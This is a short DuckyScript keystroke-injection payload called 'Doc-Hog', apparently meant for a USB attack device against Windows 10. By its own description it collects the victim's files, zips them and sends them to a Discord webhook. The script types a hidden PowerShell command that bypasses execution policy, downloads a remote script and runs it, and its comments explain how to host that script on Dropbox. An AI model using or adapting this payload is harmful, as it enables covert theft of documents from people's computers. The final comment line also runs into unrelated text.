REM     Title: Doc-Hog
REM     Author: atomiczsec
REM     Description: This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook.

DEFINE URL http://new-url.com/powershell.ps1

REM     Target: Windows 10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr $URL dl=1; iex $pl
ENTER
REM     Remember to replace the link with your DropBox shared link for the intended file to download
REM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1